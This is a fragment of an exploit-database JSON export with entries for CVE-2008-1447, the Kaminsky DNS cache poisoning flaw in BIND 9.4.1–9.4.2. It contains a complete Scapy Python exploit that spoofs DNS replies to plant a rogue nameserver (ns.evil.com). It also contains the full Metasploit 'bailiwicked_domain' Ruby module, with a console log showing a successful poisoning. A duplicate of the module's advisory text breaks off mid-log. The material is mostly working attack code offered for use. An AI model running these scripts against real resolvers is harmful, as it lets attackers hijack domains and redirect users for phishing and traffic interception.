"https://www.seebug.org/vuldb/ssvid-9168", "id": "SSV:9168", "sourceData": "\n from scapy import *\r\nimport random\r\n\r\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\r\n# http://www.solisproject.net/\r\n#\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General 
Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\r\n\r\n# This script exploit the flaw discovered by Dan Kaminsky\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\n# http://www.kb.cert.org/vuls/id/800113\r\n\r\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\r\n# the transaction ID.\r\n# It also insert Authority record for a valid record of the target domain.\r\n\r\n# To use this script, you have to discover the source port used by the vulnerable\r\n# DNS server.\r\n# Python is really slow, so it will take some time, but it works :-)\r\n\r\n\r\n# IP to insert for our dummy record\r\ntargetip = "X.X.X.X"\r\n# Vulnerable recursive DNS server\r\ntargetdns = "X.X.X.X"\r\n# Authoritative NS for the target domain\r\nsrcdns = ["X.X.X.X"]\r\n\r\n# Domain to play with\r\ndummydomain = ""\r\nbasedomain = ".example.com."\r\n# sub-domain to claim authority on\r\ndomain = "sub.example.com."\r\n# Spoofed authoritative DNS for the sub-domain\r\nspoof="ns.evil.com."\r\n# src port of vulnerable DNS for recursive queries\r\ndnsport = 32883\r\n\r\n# base packet\r\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\r\n\tUDP(sport=53, dport=dnsport)/ \\\r\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \r\n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \r\n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\r\n\t\tns=DNSRR(rrname=domain, 
rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\r\n\t)\r\n\r\n\r\ncurrentid = 1024\r\ndummyid = 3\r\nwhile 1:\r\n\tdummydomain = "a" + str(dummyid) + basedomain\r\n\tdummyid = dummyid + 1\r\n\t# request for our dummydomain\r\n\treq = IP(dst=targetdns)/ \\\r\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\r\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\r\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\r\n\t\t\t an=0,\r\n\t\t\t ns=0,\r\n\t\t\t ar=0\r\n\t\t)\r\n\tsend(req)\r\n\r\n\t# build the response\r\n\trep.getlayer(DNS).qd.qname = dummydomain\r\n\trep.getlayer(DNS).an.rrname = dummydomain\r\n\r\n\tfor i in range(50):\r\n\t\t# TXID\r\n\t\trep.getlayer(DNS).id = currentid\r\n\t\tcurrentid = currentid + 1\r\n\t\tif currentid == 65536:\r\n\t\t\tcurrentid = 1024\r\n\r\n\t\t# len and chksum\r\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\r\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\r\n\r\n\t\tprint "Sending our reply from %s with TXID = %s for %s" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\r\n\t\tsend(rep, verbose=0)\r\n\r\n\t# check to see if it worked\r\n\treq = IP(dst=targetdns)/ \\\r\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\r\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\r\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\r\n\t\t\t an=0,\r\n\t\t\t ns=0,\r\n\t\t\t ar=0\r\n\t\t)\r\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\r\n\ttry:\r\n\t\tif z[DNS].an.rdata == targetip:\r\n\t\t\tprint "Successfully poisonned our target with a dummy record !!"\r\n\t\t\tbreak\r\n\texcept:\r\n\t\tprint "Poisonning failed"\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-9168"}, {"lastseen": "2017-11-19T14:27:57", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "BIND 
9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65607", "id": "SSV:65607", "sourceData": "\n ____ ____ __ __\r\n / \\ / \\ | | | |\r\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\r\n \\____/ |__| |__| \\______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0003\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_domain.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious nameserver\r\nentry into the target nameserver which replaces the legitimate\r\nnameservers for the target domain. By causing the target nameserver to\r\nquery for random hostnames at the target domain, the attacker can spoof\r\na response to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache. 
This insertion completely replaces the original nameserver\r\nrecords for the target domain.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n ## ### ## ##\r\n ## ## #### ###### #### ##### ##### ## #### ######\r\n####### ## ## ## ## ## ## ## ## ## ## ### ##\r\n####### ###### ## ##### #### ## ## ## ## ## ## ##\r\n## # ## ## ## ## ## ## ##### ## ## ## ## ##\r\n## ## #### ### ##### ##### ## #### #### #### ###\r\n ##\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 73 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_domain\r\nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com\r\nDOMAIN => example.com\r\nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com\r\nNEWDNS => dns01.metasploit.com\r\nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0\r\nSRCPORT => 0\r\nmsf auxiliary(bailiwicked_domain) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] >> ADDRESS: A.B.C.D PORT: 50391\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\r\n[*] exec: dig +short -t ns example.com @A.B.C.D\r\n\r\nb.iana-servers.net.\r\na.iana-servers.net.\r\n\r\nmsf auxiliary(bailiwicked_domain) > run\r\n[*] Switching to target port 50391 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.\r\n[*] Querying recon nameserver for address of b.iana-servers.net....\r\n[*] Got an A record: b.iana-servers.net. 
171028 IN A 193.0.0.236\r\n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....\r\n[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.\r\n[*] Querying recon nameserver for address of a.iana-servers.net....\r\n[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43\r\n[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....\r\n[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Sent 8000 queries and 160000 spoofed responses...\r\n[*] Sent 9000 queries and 180000 spoofed responses...\r\n[*] Sent 10000 queries and 200000 spoofed responses...\r\n[*] Sent 11000 queries and 220000 spoofed responses...\r\n[*] Sent 12000 queries and 240000 spoofed responses...\r\n[*] Sent 13000 queries and 260000 spoofed responses...\r\n[*] Poisoning successful after 13250 attempts: example.com. 
== dns01.metasploit.com\r\n[*] Auxiliary module execution completed\r\n\r\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\r\n[*] exec: dig +short -t ns example.com @A.B.C.D\r\n\r\ndns01.metasploit.com.\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\nCedric Blancher <sid (@) rstack.org> figured out the NS injection method and \r\nwas cool enough to email us and share!\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary\r\n\r\n\tinclude Exploit::Remote::Ip\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'DNS BailiWicked Domain Attack',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \r\n\t\t\t\tDan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target\r\n\t\t\t\tdomains nameserver entries in a vulnerable DNS cache server. 
This attack works\r\n\t\t\t\tby sending random hostname queries to the target DNS server coupled with spoofed\r\n\t\t\t\treplies to those queries from the authoritative nameservers for that domain.\r\n\t\t\t\tEventually, a guessed ID will match, the spoofed packet will get accepted, and\r\n\t\t\t\tthe nameserver entries for the target domain will be replaced by the server\r\n\t\t\t\tspecified in the NEWDNS option of this exploit.\r\n\t\t\t},\r\n\t\t\t'Author' => \r\n\t\t\t\t[ \r\n\t\t\t\t'\tI)ruid', 'hdm',\r\n\t\t\t\t\t #\r\n\t\t\t\t\t'Cedric Blancher <sid[at]rstack.org>' # Cedric figured out the NS injection method \r\n\t\t\t\t\t # and was cool enough to email us and share!\r\n\t\t\t\t\t #\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 5591 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-1447' ],\r\n\t\t\t\t\t[ 'US-CERT-VU', '8000113' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jul 21 2008'\r\n\t\t\t))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),\r\n\t\t\t\t\tOptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),\r\n\t\t\t\t\tOptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),\r\n\t\t\t\t\tOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']),\r\n\t\t\t\t\tOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),\r\n\t\t\t\t\tOptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),\r\n\t\t\t\t], self.class)\r\n\t\t\t\t\t\r\n\tend\r\n\t\r\n\tdef auxiliary_commands\r\n\t\treturn { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n\tend\r\n\r\n\tdef cmd_check(*args)\r\n\t\ttarg = args[0] || rhost()\r\n\t\tif(not (targ and targ.length > 0))\r\n\t\t\tprint_status("usage: check 
[dns-server]")\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tprint_status("Using the Metasploit service to verify exploitability...")\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => targ,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\t\t\r\n\r\n\t\trandom = false\r\n\t\tports = []\r\n\t\tlport = nil\r\n\t\t\r\n\t\t1.upto(5) do |i|\r\n\t\t\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\r\n\t\t\t\t\t\tprint_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")\r\n\t\t\t\t\t\tt_port = t_port.to_i\r\n\t\t\t\t\t\tif(lport and lport != t_port)\r\n\t\t\t\t\t\t\trandom = true\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\t\tlport = t_port\r\n\t\t\t\t\t\tports << t_port\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\t\t\r\n\t\tsrv_sock.close\r\n\t\t\r\n\t\tif(ports.length < 5)\r\n\t\t\tprint_status("UNKNOWN: This server did not reply to our vulnerability check requests")\r\n\t\t\treturn\r\n\t\tend\r\n\t\t\r\n\t\tif(random)\r\n\t\t\tprint_status("PASS: This server does not use a static source port. 
Ports: #{ports.join(", ")}")\r\n\t\t\tprint_status(" This server may still be exploitable, but not by this tool.")\r\n\t\telse\r\n\t\t\tprint_status("FAIL: This server uses static source ports and is vulnerable to poisoning")\r\n\t\tend\r\n\tend\r\n\t\t\r\n\tdef run\r\n\t\ttarget = rhost()\r\n\t\tsource = Rex::Socket.source_address(target)\r\n\t\tsport = datastore['SRCPORT']\r\n\t\tdomain = datastore['DOMAIN'] + '.'\r\n\t\tnewdns = datastore['NEWDNS']\r\n\t\trecons = datastore['RECONS']\r\n\t\txids = datastore['XIDS'].to_i\r\n\t\tnewttl = datastore['TTL'].to_i\r\n\t\txidbase = rand(20001) + 20000\r\n\t\t\r\n\t\taddress = Rex::Text.rand_text(4).unpack("C4").join(".")\r\n\r\n\t\tsrv_sock = Rex::Socket.create_udp(\r\n\t\t\t'PeerHost' => target,\r\n\t\t\t'PeerPort' => 53\r\n\t\t)\r\n\r\n\t\t# Get the source port via the metasploit service if it's not set\r\n\t\tif sport.to_i == 0\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\ttxt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n\t\t\treq.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n\t\t\treq.rd = 1\r\n\t\t\t\r\n\t\t\tsrv_sock.put(req.encode)\r\n\t\t\tres, addr = srv_sock.recvfrom()\r\n\t\t\t\r\n\t\t\tif res and res.length > 0\r\n\t\t\t\tres = Resolv::DNS::Message.decode(res)\r\n\t\t\t\tres.each_answer do |name, ttl, data|\r\n\t\t\t\t\tif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m)\r\n\t\t\t\t\t\tt_addr, t_port = $1.split(':')\r\n\t\t\t\t\t\tsport = t_port.to_i\r\n\r\n\t\t\t\t\t\tprint_status("Switching to target port #{sport} based on Metasploit service")\r\n\t\t\t\t\t\tif target != t_addr\r\n\t\t\t\t\t\t\tprint_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Verify its not already poisoned\r\n\t\tbegin\r\n\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\tquery.add_question(domain, 
Resolv::DNS::Resource::IN::NS)\r\n\t\t\tquery.rd = 0\r\n\r\n\t\t\tbegin\r\n\t\t\t\tcached = false\r\n\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\r\n\t\t\t\t\t\tif((name.to_s + ".") == domain and data.name.to_s == newdns)\r\n\t\t\t\t\t\t\tt = Time.now + ttl\r\n\t\t\t\t\t\t\tprint_status("Failure: This domain is already using #{newdns} as a nameserver")\r\n\t\t\t\t\t\t\tprint_status(" Cache entry expires on #{t.to_s}")\r\n\t\t\t\t\t\t\tsrv_sock.close\r\n\t\t\t\t\t\t\tdisconnect_ip\r\n\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\t\t\r\n\t\t\t\tend\r\n\t\t\tend until not cached\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Exception => e\r\n\t\t\tprint_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\tend\r\n\r\n\r\n\t\tres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver\r\n\r\n\t\tprint_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"\r\n\r\n\t\t# Look up the nameservers for the domain\r\n\t\tprint_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n\t\tanswer0 = res0.send(domain, Net::DNS::NS)\r\n\t\t#print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"\r\n\r\n\t\tbarbs = [] # storage for nameservers\r\n\t\tanswer0.answer.each do |rr0|\r\n\t\t\tprint_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n\t\t\tif rr0.type == 'NS'\r\n\t\t\t\tprint_status " Querying recon nameserver for address of #{rr0.nsdname}..."\r\n\t\t\t\tanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname\r\n\t\t\t\t#print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} 
authorities"\r\n\t\t\t\tanswer1.answer.each do |rr1|\r\n\t\t\t\t\tprint_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n\t\t\t\t\tres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \r\n\t\t\t\t\tprint_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."\r\n\t\t\t\t\tanswer2 = res2.send(domain)\r\n\t\t\t\t\tif answer2 and answer2.header.auth? and answer2.header.anCount >= 1\r\n\t\t\t\t\t\tnsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n\t\t\t\t\t\tbarbs << nsrec\r\n\t\t\t\t\t\tprint_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\t\r\n\t\tend\r\n\r\n\t\tif barbs.length == 0\r\n\t\t\tprint_status( "No DNS servers found.")\r\n\t\t\tsrv_sock.close\r\n\t\t\tdisconnect_ip\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\t# Flood the target with queries and spoofed responses, one will eventually hit\r\n\t\tqueries = 0\r\n\t\tresponses = 0\r\n\r\n\t\tconnect_ip if not ip_sock\r\n\r\n\t\tprint_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...")\r\n\r\n\t\twhile true\r\n\t\t\trandhost = Rex::Text.rand_text_alphanumeric(12) + '.' 
+ domain # randomize the hostname\r\n\r\n\t\t\t# Send spoofed query\r\n\t\t\treq = Resolv::DNS::Message.new\r\n\t\t\treq.id = rand(2**16)\r\n\t\t\treq.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n\t\t\treq.rd = 1\r\n\r\n\t\t\tbuff = (\r\n\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t#:src => barbs[0][:addr].to_s,\r\n\t\t\t\t\t:src => source,\r\n\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t:proto => 17\r\n\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t:sport => (rand((2**16)-1024)+1024).to_i,\r\n\t\t\t\t\t:dport => 53\r\n\t\t\t\t)/req.encode\r\n\t\t\t).to_net\r\n\t\t\tip_sock.sendto(buff, target)\r\n\t\t\tqueries += 1\r\n\t\t\t\r\n\t\t\t# Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n\t\t\treq.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))\r\n\t\t\treq.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))\r\n\t\t\treq.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored\r\n\t\t\treq.qr = 1\r\n\t\t\treq.aa = 1\r\n\r\n\t\t\txidbase.upto(xidbase+xids-1) do |id|\r\n\t\t\t\treq.id = id\r\n\t\t\t\tbarbs.each do |barb|\r\n\t\t\t\t\tbuff = (\r\n\t\t\t\t\t\tScruby::IP.new(\r\n\t\t\t\t\t\t\t#:src => barbs[i][:addr].to_s,\r\n\t\t\t\t\t\t\t:src => barb[:addr].to_s,\r\n\t\t\t\t\t\t\t:dst => target,\r\n\t\t\t\t\t\t\t:proto => 17\r\n\t\t\t\t\t\t)/Scruby::UDP.new(\r\n\t\t\t\t\t\t\t:sport => 53,\r\n\t\t\t\t\t\t\t:dport => sport.to_i\r\n\t\t\t\t\t\t)/req.encode\r\n\t\t\t\t\t).to_net\r\n\t\t\t\t\tip_sock.sendto(buff, target)\r\n\t\t\t\t\tresponses += 1\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\t\t# status update\r\n\t\t\tif queries % 1000 == 0\r\n\t\t\t\tprint_status("Sent #{queries} queries and #{responses} spoofed responses...")\r\n\t\t\tend\r\n\r\n\t\t\t# every so often, check and see if the target is poisoned...\r\n\t\t\tif queries % 250 == 0 \r\n\t\t\t\tbegin\r\n\t\t\t\t\tquery = Resolv::DNS::Message.new\r\n\t\t\t\t\tquery.add_question(domain, 
Resolv::DNS::Resource::IN::NS)\r\n\t\t\t\t\tquery.rd = 0\r\n\t\r\n\t\t\t\t\tsrv_sock.put(query.encode)\r\n\t\t\t\t\tanswer, addr = srv_sock.recvfrom()\r\n\r\n\t\t\t\t\tif answer and answer.length > 0\r\n\t\t\t\t\t\tanswer = Resolv::DNS::Message.decode(answer)\r\n\t\t\t\t\t\tanswer.each_answer do |name, ttl, data|\r\n\t\t\t\t\t\t\tif((name.to_s + ".") == domain and data.name.to_s == newdns)\r\n\t\t\t\t\t\t\t\tprint_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")\r\n\t\t\t\t\t\t\t\tsrv_sock.close\r\n\t\t\t\t\t\t\t\tdisconnect_ip\r\n\t\t\t\t\t\t\t\treturn\r\n\t\t\t\t\t\t\tend\r\n\t\t\t\t\t\tend\r\n\t\t\t\t\tend\r\n\t\t\t\trescue ::Interrupt\r\n\t\t\t\t\traise $!\r\n\t\t\t\trescue ::Exception => e\r\n\t\t\t\t\tprint_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n\t\t\t\tend\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\nend\t\r\n\r\n# milw0rm.com [2008-07-23]\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-65607"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "edition": 1, "published": "2008-07-23T00:00:00", "title": "BIND 9.4.1 9.4.2 - Remote DNS Cache Poisoning (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-23T00:00:00", "id": "EXPLOITPACK:27E16B81271E43AFE05860EF5FF64C4D", "href": "", "sourceData": " ____ ____ __ __\n / \\ / \\ | | | |\n ----====####/ /\\__\\##/ /\\ \\##| |##| |####====----\n | | | |__| | | | | |\n | | ___ | __ | | | | |\n ------======######\\ \\/ /#| |##| |#| |##| |######======------\n \\____/ |__| |__| \\______/\n \n Computer Academic Underground\n http://www.caughq.org\n Exploit Code\n\n===============/========================================================\nExploit ID: CAU-EX-2008-0003\nRelease Date: 2008.07.23\nTitle: 
bailiwicked_domain.rb\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains\nTested: BIND 9.4.1-9.4.2\nAttributes: Remote, Poison, Resolver, Metasploit\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt\nAuthor/Email: I)ruid <druid (@) caughq.org>\n H D Moore <hdm (@) metasploit.com>\n===============/========================================================\n\nDescription\n===========\n\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\nwhich allow the insertion of malicious DNS records into the cache of the\ntarget nameserver. This exploit caches a single malicious nameserver\nentry into the target nameserver which replaces the legitimate\nnameservers for the target domain. By causing the target nameserver to\nquery for random hostnames at the target domain, the attacker can spoof\na response to the target server including an answer for the query, an\nauthority server record, and an additional record for that server,\ncausing target nameserver to insert the additional record into the\ncache. 
This insertion completely replaces the original nameserver\nrecords for the target domain.\n\n\nExample\n=======\n\n# /msf3/msfconsole\n\n ## ### ## ##\n ## ## #### ###### #### ##### ##### ## #### ######\n####### ## ## ## ## ## ## ## ## ## ## ### ##\n####### ###### ## ##### #### ## ## ## ## ## ## ##\n## # ## ## ## ## ## ## ##### ## ## ## ## ##\n## ## #### ### ##### ##### ## #### #### #### ###\n ##\n\n\n =[ msf v3.2-release\n+ -- --=[ 298 exploits - 124 payloads\n+ -- --=[ 18 encoders - 6 nops\n =[ 73 aux\n\nmsf > use auxiliary/spoof/dns/bailiwicked_domain\nmsf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D\nRHOST => A.B.C.D\nmsf auxiliary(bailiwicked_domain) > set DOMAIN example.com\nDOMAIN => example.com\nmsf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com\nNEWDNS => dns01.metasploit.com\nmsf auxiliary(bailiwicked_domain) > set SRCPORT 0\nSRCPORT => 0\nmsf auxiliary(bailiwicked_domain) > check\n[*] Using the Metasploit service to verify exploitability...\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] >> ADDRESS: A.B.C.D PORT: 50391\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\nmsf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D\n[*] exec: dig +short -t ns example.com @A.B.C.D\n\nb.iana-servers.net.\na.iana-servers.net.\n\nmsf auxiliary(bailiwicked_domain) > run\n[*] Switching to target port 50391 based on Metasploit service\n[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com\n[*] Querying recon nameserver for example.com.'s nameservers...\n[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.\n[*] Querying recon nameserver for address of b.iana-servers.net....\n[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236\n[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....\n[*] b.iana-servers.net. 
